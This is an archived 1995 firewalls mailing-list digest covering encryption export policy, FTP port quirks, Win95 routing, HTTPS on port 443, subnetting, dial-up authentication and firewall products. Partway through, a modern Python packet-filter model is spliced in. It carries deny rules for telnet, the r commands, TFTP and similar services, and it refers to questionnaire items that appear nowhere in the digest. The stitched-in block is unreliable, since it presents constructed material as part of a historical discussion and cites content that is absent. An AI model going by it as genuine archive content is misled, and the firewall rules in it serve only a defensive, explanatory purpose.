To: "'firewalls@greatcircle.com'"
Subject: Re: International Encryption Protocols (RC2) or (IDEA)
Date: Thu, 12 Oct 95 11:46:00 GMT

Adam Shostack wrote:

Ian J-B wrote:
> While Ian is substantially correct about the actions of
>governments, there are two points that he does not address. The first
>is that governments are subject to lobbying, the second is that most
>companies probably do not plan to wait six months to hear Washington
>or Brussels dictate their information security plans; they have real
>needs today that they should be planning to meet.
>
> Governments are subject to lobbying.
>Most of the governments
>that make the laws that cover most of the internet are, to one extent
>or another, answerable to the people, and do try to seek professional
>advice before making decisions. As most of us are aware, building
>strong information infrastructure requires strong cryptography; it's
>like using concrete for highways. Governments will need to make
>allowances for this for the Information Superhighway to be built.
>(Just today, another article on Internet insecurities was on the front
>page of the New York Times. This is no longer a small issue.)
>
> You have needs now; odds are good that those needs do not
>include Clipper. From the point of view of building a secure network,
>or offering secure services, Clipper and its relatives are a single
>point of failure outside of your control. The government employees
>who own the database don't answer to you. They are corruptible, and
>for a small price. Aldrich Ames cost three million dollars. Could
>you buy the Clipper database for less? How much could you steal if
>all data moving in the
>
> There is a large amount of fear, uncertainty, and doubt about
>cryptography's future. My advice is to build systems based on today's
>laws, and not on what the future may hold, if no one speaks up to
>oppose it. Clipper has died an ignoble death in the US, it is fair to
>assume its relatives will do the same in Europe.

Adam makes some very valid points. Most governments consult individuals and corporations before drafting/changing legislation. How they select those contributors can be flawed, and some that are contacted fail to respond. Several of us have also served, and do serve, on a variety of working parties which are set up or sponsored by governments, 'standards' bodies and international organisations. The work of these contributors generally benefits all of us but may not represent all views, or be free of vested interests.
The only way to influence legislation is to lobby political representatives, government officials and government executives, but remarkably few individuals and corporations take the time to do that. Most prefer to complain bitterly that their particular government failed to take full account of their particular interests. Of course they would complain even louder if taxes increased dramatically because their government embarked on a development programme to build a better crystal ball.

I would never advocate postponing a procurement decision in the *hope* that something better might arrive in a few months, and legislation usually takes rather longer anyway. However, I would suggest that it is wise to look carefully at all options before making that decision, after carefully building an enterprise and risk policy suite so that you know what and why you want to do something and can express your needs clearly to vendors. That also greatly helps in the process of evaluating the responses.

We also suffer from the changing circumstances. Major changes in international relations have coincided with dramatic growth in the availability and use of Information Super Highways. That's had at least two effects. NATO and friendly powers built a set of rules to address issues raised by the Communist Bloc countries and the computer and communications technologies of the 1960s and 70s, and did not need to address commercial interests in ISHs because that environment did not exist internationally as it does today. During this period of international tension a set of needs, organisations and vendor groups established and developed risk management in watertight compartments. What made sense then does not necessarily make sense today, and risk management was largely built around government data classification systems.
Today demand for data risk management is increasing more rapidly than the supply of *skilled* risk professionals, and many of those professionals who are available have difficulty in making the transition from the defined military/intelligence environment to the commercial environment. In this new world, demand is creating the opportunities for 'cowboy' vendors to make the wildest claims without sanction, FUD abounds, legislation lags behind technology and there are a number of government organisations looking for a new home and purpose. Ain't life a bitch.

Over the coming months there will probably be two developments. Major government policy reviews will complete in several areas, including the European Union. Previously, governments have been concerned primarily with the crime aspects of encryption and the fear that organised crime could use ISH environments in a number of ways, particularly as a communications system which is better than that used by police services. As with any intelligence organisation, a police service has to get inside the decision loop of the enemy and, unlike a military unit, does not have the means to drop 500Kg smart bombs from 17,000 feet onto the enemy command and control network. They have always relied on being able to 'tap' mail and phone communications, with or without a court order. Email threatens that ability because of volume and multiple routing options, and could defeat it through the use of encryption. That could enable the criminal to get inside the police decision loop. For that reason, and a few others, governments have sought to control the use of encryption but have the challenge of how they do that outside their national boundaries. What is now happening is that other government organisations are coming to understand that this policy can have damaging consequences for the economics of commerce and national treasuries.
This is generating the pressure to review encryption policies, and in some cases this is being done as a high priority (of course a high priority for governments may not produce results that fast). So far much lobbying has been done on the security services side of government, but better results may be produced by lobbying the financial and commercial arms of government.

The other area of development is on the commercial and technical side of encryption. Today there are many encryption systems and standards. Some of these are not particularly good and, outside government, are single-level system-high approaches. There will be some major shake-outs and it's anyone's guess what the result will be or how long the process will take. In part it's all bound into the current restrictions on import and export imposed by the US Federal Government, in whose territory many of the products originate. Whatever a user adopts today may become obsolete tomorrow, but then so does much of the information technology, so it is important to accept that today's 'quick fix' may have a short life and introduce high overheads.
Ian J-B

From firewalls-owner Thu Oct 12 05:00:09 1995
To: firewalls@greatcircle.com (Firewalls Mailing List)
Cc: fod@fws.ilo.dec.com
Subject: Re: International Encryption Protocols
Date: Thu, 12 Oct 1995 12:45:52 +0100
From: "Frank O'Dwyer"

> Ted Doty writes:
> > Certainly the signatory countries to the CoCom treaty all enforce similar
> > export controls to those enforced by the USA. Therefore, do not go looking
> > to purchase cryptography in the UK for use outside the UK.
>
> I think this is misleading. CoCom, the Coordinating Committee for
> Multilateral Export Controls, amounted to a non-proliferation pact to
> prevent the spread of supercomputers and other hot potatoes beyond the
> club of countries to untrusted (non-CoCom) countries. As far as I can tell it
> did not erect export barriers _between member countries_, except perhaps some
> ordinary red tape.
After all, if the CoCom countries _weren't_ willing to sell each other crypto equipment, how could they spy on one another? :-)

Cheers,
Frank O'Dwyer

(Actually the :-) may not be necessary - I believe there was a story in the news recently about the UK 'authorities' snooping on Irish official traffic carried on UK-supplied equipment.)

From firewalls-owner Thu Oct 12 06:00:13 1995
To: "Frank O'Dwyer"
cc: firewalls@greatcircle.com (Firewalls Mailing List)
Subject: Re: International Encryption Protocols
Date: Thu, 12 Oct 1995 13:43:00 +0100
From: Justin Mason

Frank O'Dwyer sez:
>After all, if the CoCom countries _weren't_ willing to sell each other
>crypto equipment, how could they spy on one another? :-)
>
>(Actually the :-) may not be necessary - I believe there was a story
> in the news recently about the UK 'authorities' snooping on Irish
> official traffic carried on UK-supplied equipment.)

Almost right -- it was the UK surveillance service (GCHQ) snooping on Irish official traffic carried on US-supplied crypto equipment.
Apparently, the equipment in question had a "back door", courtesy of the NSA; when GCHQ found out that the Irish govt were using this equipment, they had only to ask their NSA pals for the details. I only heard the details myself via a popular-science program on crypto ;), so the so-called back door may not have been a deliberately weakened algorithm; it may have been a set of keys from a key-escrow repository or some such.

--j.

From firewalls-owner Thu Oct 12 07:00:24 1995
Date: Thu, 12 Oct 1995 08:59:34 -0500
From: Ken Hardy
To: firewalls@greatcircle.com
Subject: Re: NT FTP weirdness

>FTP.microsoft.com initiates all data port connections from random,
...
>Since ftp.microsoft.com's FTP-data connections weren't coming from port
>20, they weren't allowed in.

Fine, let M$ redefine the standards, as is their wont, until nobody can connect to them. Maybe if we all ignore them, they'll just go away.
-KH

From firewalls-owner Thu Oct 12 08:13:20 1995
Date: Thu, 12 Oct 1995 17:07:35 +0200 (EET)
From: Keinanen Vesa
To: Brian Murrell
Cc: Tim Keanini, Firewalls@GreatCircle.COM
Subject: Re: 'route' and WIN95

I tried to browse through the Win95 Resource Kit to find out if Win95 does IP routing. Most TCP/IP sections didn't say anything about routing. One section about dial-up networking said that Win95 acting as a Dial-Up server cannot do IP routing. Anyhow, that didn't convince me, because I knew that TCP/IP-32 for Win3.11 already had IP routing. Finally I found the following:

From Microsoft Win95 resource kit:

  TCP/IP Registry Entries in the MSTCP Subkey
  Hkey_Local_Machine\System\CurrentControlSet\Services\Vxd\MSTCP

  EnableRouting = 0 or 1
  Specifies whether to enable static routing. Microsoft TCP/IP does not
  supply a routing protocol, so all route table entries must be entered
  using the route command. The default is 0.

You can manipulate Registry Entries with the "regedit" tool. It took me 30 seconds to turn that parameter on. Unfortunately I cannot verify if it actually did anything, because my machine has just 1 ethernet interface. If any of you have a Win95 machine with 2 interfaces, please try this out and tell us what happens.
To summarize:

* It seems that Win95 may do IP routing
* By default routing is turned off
* You cannot turn it on by accident
* Win95 doesn't send RIP broadcasts to advertise itself, so other routers don't automatically learn routes through that host. (But we have IP Source Route to get over that routing problem)

VK
--
Vesa Keinanen    Nasilinnankatu 24 D, 33210 Tampere, Finland
Relevantum Oy    Phone +358 31 2147200, Fax +358 31 2147402

From firewalls-owner Thu Oct 12 08:45:21 1995
Date: Thu, 12 Oct 95 11:36:45 EST
From: "Chris Brenton"
Subject: Re: Port question

On Wed, 11 Oct 1995, Chris Brenton wrote:
> Does anyone know what port 443 is used for? Check out:
>
> http://necxdirect.necx.com

Thanks to all who helped me out on this one. Port 443 appears to be used by Netscape Commerce Server for secure (?? :) transactions. I opened this port up to outgoing traffic and life is again good.
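Three messages above describe the same router packet-filter logic: the questionnaire's list of protocols to deny at the router (items 8 to 17), Ken Hardy's note that ftp.microsoft.com's data connections were dropped because they did not come from port 20, and Chris Brenton opening port 443 for outgoing traffic. The following Python model of such a stateless, first-match filter is an added example, not code from any poster; the internal prefix, the hosts and the sample packets are constructed.

```python
"""Stateless packet filter of the kind discussed in the thread: a router
rule list evaluated first-match-wins with a default deny.  Added example,
not code from any poster; INTERNAL_PREFIX, the hosts and the sample packets
are constructed.  Direction is judged from the source address only, which
is how a simple border router sees it."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

INTERNAL_PREFIX = "10.1."          # constructed: "our" side of the router


@dataclass(frozen=True)
class Packet:
    proto: str                     # "tcp", "udp", "icmp" or "ipip" (IP over IP)
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    ack: bool = False              # TCP ACK bit; clear on a connection's first packet

    @property
    def direction(self) -> str:
        return "out" if self.src.startswith(INTERNAL_PREFIX) else "in"


@dataclass(frozen=True)
class Rule:
    action: str                    # "allow" or "deny"
    proto: Optional[str] = None    # None means "any"
    direction: Optional[str] = None
    sport: Optional[range] = None
    dport: Optional[range] = None
    ack: Optional[bool] = None
    note: str = ""

    def matches(self, p: Packet) -> bool:
        return ((self.proto is None or p.proto == self.proto)
                and (self.direction is None or p.direction == self.direction)
                and (self.sport is None or p.sport in self.sport)
                and (self.dport is None or p.dport in self.dport)
                and (self.ack is None or p.ack == self.ack))


def port(n: int) -> range:
    """Single-port range helper."""
    return range(n, n + 1)


# The questionnaire's deny list (items 8-17) followed by the allows needed for
# the services it wants (WWW, FTP gets, outbound telnet).  Order matters.
ROUTER_FILTER: List[Rule] = [
    Rule("deny", proto="icmp", note="Q8 ICMP"),
    Rule("deny", proto="udp", dport=port(520), note="Q9 RIP"),
    Rule("deny", proto="tcp", direction="in", dport=port(25), note="Q10 SMTP"),
    Rule("deny", proto="tcp", direction="in", dport=port(23), note="Q11 incoming telnet"),
    Rule("deny", proto="tcp", direction="in", dport=port(111), note="Q12 RPC portmapper"),
    Rule("deny", proto="udp", direction="in", dport=port(111), note="Q12 RPC portmapper"),
    Rule("deny", proto="udp", dport=port(69), note="Q13 TFTP"),
    Rule("deny", proto="tcp", direction="in", dport=port(21), note="Q14 incoming FTP"),
    Rule("deny", proto="tcp", direction="in", dport=range(512, 515), note="Q15 r commands"),
    Rule("deny", proto="ipip", note="Q16 IP over IP (MBone tunnels)"),
    Rule("deny", proto="tcp", direction="in", dport=range(6000, 6064), note="Q17 X11"),
    Rule("allow", proto="tcp", direction="out", note="sessions we open: WWW, FTP, telnet, 443"),
    Rule("allow", proto="tcp", direction="in", ack=True, note="replies to sessions we opened"),
    # Classic active-mode FTP rule: the server's data connection must come
    # FROM port 20.  A data connection from any other source port, as in the
    # ftp.microsoft.com report, falls through to the default deny.  An FTP
    # proxy (Q19) avoids trusting the source port at all.
    Rule("allow", proto="tcp", direction="in", sport=port(20), dport=range(1024, 65536),
         note="active FTP data from port 20"),
]


def filter_packet(p: Packet, rules: List[Rule] = ROUTER_FILTER) -> Tuple[str, str]:
    """Return (action, note) of the first matching rule, else the default deny."""
    for r in rules:
        if r.matches(p):
            return r.action, r.note
    return "deny", "default deny (no rule matched)"


# Constructed sample traffic mirroring the cases in the thread.
SAMPLES = {
    "outgoing telnet":           Packet("tcp", "10.1.2.3", "192.0.2.10", 1500, 23),
    "incoming telnet":           Packet("tcp", "192.0.2.10", "10.1.2.3", 1500, 23),
    "ftp data from port 20":     Packet("tcp", "192.0.2.20", "10.1.2.3", 20, 1234),
    "ftp data from random port": Packet("tcp", "192.0.2.20", "10.1.2.3", 3021, 1234),
    "https reply (port 443)":    Packet("tcp", "192.0.2.30", "10.1.2.3", 443, 1501, ack=True),
    "icmp echo":                 Packet("icmp", "192.0.2.10", "10.1.2.3"),
    "rpc portmapper":            Packet("tcp", "192.0.2.10", "10.1.2.3", 1500, 111),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        action, why = filter_packet(pkt)
        print(f"{name:28s} {action:5s} ({why})")
```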
From firewalls-owner Thu Oct 12 08:46:21 1995
Date: Thu, 12 Oct 1995 11:18:48 -0400 (EDT)
From: Scott Barman
To: Ken Hardy
Cc: firewalls@greatcircle.com
Subject: Re: NT FTP weirdness

On Thu, 12 Oct 1995, Ken Hardy wrote:
>
> >FTP.microsoft.com initiates all data port connections from random,
> ...
> >Since ftp.microsoft.com's FTP-data connections weren't coming from port
> >20, they weren't allowed in.
>
> Fine, let M$ redefine the standards, as is their wont, until nobody can
> connect to them. Maybe if we all ignore them, they'll just go away.

Or let them use a better OS (see my .sig below)!

scott barman
--
scott barman             DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com     and I speak only for myself.
barman@ix.netcom.com

"I don't know if security explains why the Win95 support Web servers run BSDI 2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is the ideal Web software solution. Does Redmond know something we don't know?" -Robert X. Cringely, INFOWORLD, 9/11/95

From firewalls-owner Thu Oct 12 08:47:22 1995
Date: Thu, 12 Oct 1995 11:08:18 -0700
To: Firewalls@GreatCircle.COM
From: janken@rust.net (Kenneth J. Stephens)
Subject: Firewall Market Survey (Sort of) V3

To view the Computer Security Institute (CSI) 1995 INTERNET Security survey information, aim your browser at http://www.rust.net/~janken/milconsu.html and click on the CSI Survey button. Please address any questions about the survey information to CSI, who is solely responsible for the contents. Please note that this information is in two 170k-byte JPEG files that will take a little time to load into your browser.

My thanks to the RUSTnet and GreatCircle folks for their support.

Ken

PS: I do not represent CSI in any way, shape or form. This information is presented without any validation of its accuracy. Bring your own grain of salt.

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                       []
[] Ken Stephens        Senior Capacity Planner/Data Security Officer     []
[] email: Ken_Stephens@miconsulting.com          Voice (313) 876-5081    []
[] Michigan Employment Security Commission (MESC)  Fax (313) 876-6827    []
[] 7th Fl. I.S.                                                          []
[] 7310 Woodward Ave                                                     []
[] Detroit, MI 48202                                                     []
[]                                                                       []
[] Millennium Consulting           Your Security Policy is only          []
[] 28234 Diesing Dr.               as strong as your organization's      []
[] Madison Heights, MI 48071       commitment to it.                     []
[]                                                                       []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Thu Oct 12 08:48:30 1995
From: Howard Berkowitz
Subject: Re: First and last subnet ???
To: yg@muturl.planet-int.net (Yannick Gravel)
Date: Thu, 12 Oct 1995 11:05:03 -0400 (EDT)
Cc: firewalls@GreatCircle.COM

>
> Hi Net&Sys Security peoples,
>
> Something that everybody is talking about, but not everybody
> is saying the same thing about subnetting:
>
> Yes, everybody agrees that we lose the first and last host of
> each subnet for net.iding and broadcasting.
>
> But, some are saying that I can use all subnets; but others are
> saying that we lose the first and last subnet...
>
> Whom truth is true..
>
> Thanks..
>
> Yannick Gravel
> System administrator -- yannick.gravel@planet-int.net
>

This is a FAQ about a confusing subject. The IP RFC states that the all-ones and all-zeroes subnets are illegal. I recommend not using them. They will work in some circumstances, but can cause obscure problems later.

A pair of simple examples:

  172.31.0.0
  172.31.0.0

One is subnet zero of network 172.31.0.0, the other is the whole network. Which is which?
  172.31.255.255
  172.31.255.255

One is the broadcast for the whole network; the other is the broadcast for subnet 255. Again, which is which?

You may say that it's easy enough to figure this out if you know the subnet mask. "Classful" routing protocols such as RIP and IGRP, however, don't transmit the mask in routing updates. If the receiving host or router doesn't have another way to learn the mask, it can't interpret the address and is likely to have a problem with the all-zeroes and all-ones subnets.

Classless routing protocols such as OSPF, EIGRP, and Integrated IS-IS do send mask information, so in principle they can support the all-zeroes and all-ones subnets. Problems can occur, however, if they have to export such an address into a classful routing environment.

Some routers will let you configure these subnets, others will never allow it. Cisco lets you do it only if you explicitly configure it; it will give you a %bad mask diagnostic if not.

Howard

From firewalls-owner Thu Oct 12 09:08:47 1995
Date: Thu, 12 Oct 1995 09:36:41 -0400
From: Anton Aylward

From firewalls-owner Thu Oct 12 09:20:17 1995
Date: Thu, 12 Oct 1995 15:48:31 GMT
From: bret@real.com (Bret McDanel)
To: firewalls@greatcircle.com
Subject: Re: Port question

> Does anyone know what port 443 is used for? Check out:
>
> http://necxdirect.necx.com
>
> You're passed to port 8002 and then 443. Does anyone see any problems with opening
> up port 443 access to the net?
>
> Thanks for any help!
>

That seems to be a cgi script.. (I have a program that will snag the html, and I noticed that if I connect to port 8002 without first connecting to port 80 (standard httpd) it would give nothing)

According to RFC 1700 "Assigned Numbers":

  https  443/tcp  https  MCom
  https  443/udp  https  MCom

It's my guess that 443 is supposed to be used there.. look at the html, it says:

  Location: https://necxdirect.necx.com/docroot/index.html

Just a guess..
:)

From firewalls-owner Thu Oct 12 10:05:23 1995
From: Daniel Curry
Date: Thu, 12 Oct 95 08:55:25 -0700
To: Keinanen Vesa
Subject: Re: 'route' and WIN95
Cc: Brian Murrell, Tim Keanini, Firewalls@GreatCircle.COM
Reply-To: daniel_curry@filoli.com

Has anyone found out if WIN95 supports "inetd" via a PPP assigned hosts connection?

Thank you,
-Dan

Begin forwarded message:

Date: Thu, 12 Oct 1995 17:07:35 +0200 (EET)
From: Keinanen Vesa
To: Brian Murrell
Cc: Tim Keanini, Firewalls@GreatCircle.COM
Subject: Re: 'route' and WIN95

I tried to browse through the Win95 Resource Kit to find out if Win95 does IP routing. Most TCP/IP sections didn't say anything about routing. One section about dial-up networking said that Win95 acting as a Dial-Up server cannot do IP routing. Anyhow, that didn't convince me, because I knew that TCP/IP-32 for Win3.11 already had IP routing.
Finally I found following: >From Microsoft Win95 resource kit: TCP/IP Registry Entries in the MSTCP Subkey Hkey_Local_Machine\System\CurrentControlSet\Services\Vxd\MSTCP From firewalls-owner Thu Oct 12 10:15:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09136 for firewalls-outgoing; Thu, 12 Oct 1995 09:38:01 -0700 Received: from merit.edu (merit.edu [35.1.1.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA09129 for ; Thu, 12 Oct 1995 09:37:58 -0700 Received: from ohm.merit.edu (ohm.merit.edu [198.108.60.65]) by merit.edu (8.6.12/merit-2.0) with ESMTP id MAA18146; Thu, 12 Oct 1995 12:36:07 -0400 From: William Bulley Received: (web@localhost) by ohm.merit.edu (8.6.9/8.6.5) id MAA28134; Thu, 12 Oct 1995 12:45:01 -0400 Message-Id: <199510121645.MAA28134@ohm.merit.edu> Subject: Re: Dial-up access To: PESTONI@BUEVM1.VNET.IBM.COM Date: Thu, 12 Oct 1995 12:44:59 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510112317.QAA15148@miles.greatcircle.com> from "firewalls-owner@GreatCircle.COM" at Oct 11, 95 08:11:07 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 931 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to firewalls-owner@GreatCircle.COM: > > I have a couple of questions about support for dial-up access. > Can anyone point me to information about SLIP and PPP implementing > TACACS/+ or RADIUS (unfortunately, I need to support DOS too)? > How about concentrators for asynchronous lines (aka terminal server, > aka access server) that include filtering (a la Cisco's 2511)? We have a version of Merit RADIUS (albeit a little long in the tooth now...) which runs on Novell NetWare 3.x -- would that help? A more up-to-date version (based on a recent 2.x release of Merit RADIUS) is in the works for NetWare 4.x (which I guess includes 3.x automagically) Regards, web... 
-- William Bulley, N8NXN Senior Systems Research Programmer Merit Network Inc. Domain: web@merit.edu 4251 Plymouth Road MaBell: (313) 764-9993 Ann Arbor, Michigan 48105-2785 Fax: (313) 747-3185 From firewalls-owner Thu Oct 12 10:43:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA10352 for firewalls-outgoing; Thu, 12 Oct 1995 10:08:04 -0700 Received: from innergate.sni.co.uk (gate.sni.co.uk [193.116.1.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA10330 for ; Thu, 12 Oct 1995 10:07:52 -0700 Received: from squidgy.sni.co.uk (squidgy.sni.co.uk [137.223.5.110]) by innergate.sni.co.uk (8.6.11/8.6.6) with SMTP id RAA16300 for ; Thu, 12 Oct 1995 17:21:18 GMT Received: by squidgy.sni.co.uk with Microsoft Mail id <307D59AC@squidgy.sni.co.uk>; Thu, 12 Oct 95 18:08:44 UTC From: Andy Dent To: firewalls Subject: Looking for CHAP Authentication on PPP Date: Thu, 12 Oct 95 18:07:00 UTC Message-ID: <307D59AC@squidgy.sni.co.uk> Encoding: 55 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi We're setting up a private network here to allow a mixture of dial-in PPP and ISDN2 users to access a single WWW Server. The server is connected to our internal network using a second NIC via a router to gain access to a number of internal databases. I THINK I have taken the correct precautions to stop unwanted people using this server as a jumping off point to our internal network but I am still missing some things. One is details on how to authenticate the PPP Dialin users. I think (unless someone can suggest a better alternative) we would like to use some form of challenge/response mechanism to validate the user - in addition I want to be able to allocate an IP address to that user by a login and password - this is so we can control what the user is allowed access to by the IP address. (The http Daemon I am using has been modified to validate Protection Rules through a database). 
My theory is that if they can get past an unpublished telephone number, the on-time - AND a valid user /password - it's reasonably safe to assume they really are who I think they are... I know that trumpet for example supports PAP - does any one know of a Windows product that supports CHAP? Is there a better way of doing this? Finally - I am also looking for a very basic TCP/IP package for DOS based Palmtops - These are not very powerful and will be connecting to a dedicated - stand-alone FTP server for download only. Ideally I want to use the same style of one-time challenge/response type mechanism. Though I have been listening in on firewalls for some time - I still consider myself to be a novice at these things so any help would be appreciated. Regards Andy Dent Siemens Nixdorf Information Systems Limited Siemens House Oldbury Bracknell Berks ENGLAND E-mail adent@sni.co.uk or dent.kent@sni.de From firewalls-owner Thu Oct 12 11:01:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12155 for firewalls-outgoing; Thu, 12 Oct 1995 10:52:13 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12148 for ; Thu, 12 Oct 1995 10:52:10 -0700 Received: from nahanni.BouletFermat.ab.ca by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id KAA17113; Thu, 12 Oct 1995 10:43:00 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA03888 for firewalls@greatcircle.com; Thu, 12 Oct 1995 11:53:49 -0600 Date: Thu, 12 Oct 1995 11:53:49 -0600 From: Danny Boulet Message-Id: <199510121753.LAA03888@nahanni.BouletFermat.ab.ca> To: firewalls@greatcircle.com Subject: ipfirewall v2.0d and the GNU Public License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been informed that ipfirewall v2.0d may violate the GNU Public License. 
Until this matter is cleared up, I've ask the two ftp sites mentioned in my posting of a few days ago to remove the v2.0d version. ipfirewall v2.0c doesn't suffer from whatever problems v2.0d may suffer from. Consequently, it is still available at the following locations: ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0c.shar.gz ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0c.shar.gz Terribly sorry if this causes any problems. Since GPL isn't exactly 'on topic' for this mailing list, please avoid any discussion of this issue on this list. -Danny From firewalls-owner Thu Oct 12 11:14:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12136 for firewalls-outgoing; Thu, 12 Oct 1995 10:51:35 -0700 Received: from gatekeeper.ray.com (gatekeeper.ray.com [138.125.162.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12129 for ; Thu, 12 Oct 1995 10:51:32 -0700 Received: from localhost (mailer@localhost) by gatekeeper.ray.com (8.6.4/8.6.5) id NAA21715; Thu, 12 Oct 1995 13:49:35 -0400 Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Thu Oct 12 13:48:17 1995 Received: by eo.ray.com (5.0/SMI-SVR4) id AA21286; Thu, 12 Oct 1995 13:48:01 -0400 Date: Thu, 12 Oct 1995 13:48:01 -0400 From: hhantman@eo.ray.com (Howard Hantman) Message-Id: <9510121748.AA21286@eo.ray.com> To: firewalls@GreatCircle.COM, ken@bridge.com Subject: Re: NT FTP weirdness Content-Length: 796 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > FTP.microsoft.com initiates all data port connections from random, ... > Since ftp.microsoft.com's FTP-data connections weren't coming from port > 20, they weren't allowed in. FTP.microsoft.com does not appear to implement other parts of the FTP standard, either. If you do not send it an explicit PORT command prior to doing a file transfer it also hangs, rather than making the connection to the same port number the control connection came from as required by the spec. 
I have reported the problem to them several times with no response. Howard Hantman Manager, Technology Integration Corporate ITS Raytheon Company From firewalls-owner Thu Oct 12 11:31:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA12878 for firewalls-outgoing; Thu, 12 Oct 1995 11:17:38 -0700 Received: from inc.net (beta.inc.net [204.95.160.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA12871 for ; Thu, 12 Oct 1995 11:17:34 -0700 Received: from inc.net by inc.net (4.1/SMI-4.1) id AA27609; Thu, 12 Oct 95 13:15:43 CDT Received: from ([204.154.225.101]) by thud (5.x/SMI-SVR4) id AA00611; Thu, 12 Oct 1995 13:14:34 -0500 Message-Id: <307D7741.556F@strong-funds.com> Date: Thu, 12 Oct 1995 13:14:57 -0700 From: Walt Herrmann X-Mailer: Mozilla 2.0b1 (Windows; I; 16bit) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Firewall1 Comparison X-Url: http://home.netscape.com/comprod/products/navigator/version_2.0/contest_rules.html Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are looking at purchasing the Firewall1 product. According to the Trade magazines, as a firewall it appears to be the premire product. If anyone has any additional competitive information or experiences with Firewall1, I would appreciate passing it along. Has anyone heard of V-ONE SmartWall as a firewall? Any experiences. 
From firewalls-owner Thu Oct 12 12:17:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA14533 for firewalls-outgoing; Thu, 12 Oct 1995 12:00:48 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA14525 for ; Thu, 12 Oct 1995 12:00:44 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id LAA08175; Thu, 12 Oct 1995 11:58:41 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma008172; Thu Oct 12 11:58:15 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id LAA05677; Thu, 12 Oct 1995 11:55:19 -0700 Date: Thu, 12 Oct 1995 11:55:19 -0700 From: Brian Murrell Message-Id: <199510121855.LAA05677@mocha.bctel.net> To: avalon@coombs.anu.edu.au, firewalls@GreatCircle.COM, gblolmxb@ibmmail.com Subject: Re: Your Message Sent on Wed, 11 Oct 1995 05:35:37 EDT Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: HUyT3gHSVE2xcuMbW+ts9w== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Darren Reed wrote about his local telco starting up a 'private' > network, in conjunction with AT&T, NTT,Unisource and Deustche > Telekom. > > This sort of network has been around for some time, IBM for example > have a global network, and it can be use for IP, IPX etc. > > I have raised the need for a firewall to filter IP traffic in the > past, but have been told that there is no need as the network is > private & secure. I dont believe this, does anyone else have any > comments? (preferably from people who know about IBM's MPN). When deciding whether to firewall or not, don't make you decision based on whether the network is the Internet or not. You should always ask yourself the question: "Do I trust the entire community I share this network with??". If the answer is no, firewall!! b. -- Brian J. 
Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Oct 12 12:48:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15584 for firewalls-outgoing; Thu, 12 Oct 1995 12:33:57 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA15570 for ; Thu, 12 Oct 1995 12:33:53 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa28891; 12 Oct 95 15:26 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma027684; Thu, 12 Oct 95 15:08:47 -0400 Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA01780; Thu, 12 Oct 95 15:25:40 EDT Message-Id: <9510121925.AA01780@tis.com> X-Sender: avolio@sol.tis.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 12 Oct 1995 15:25:48 -0400 To: Walt Herrmann , firewalls@greatcircle.com From: Frederick M Avolio Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SmartWall is based on the Gauntlet Internet Firewall, our product. We are a competitor of Firewall-1. The premire firewall?? I read the trade mags and don't see this indicated. Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. Application gateways are more secure. 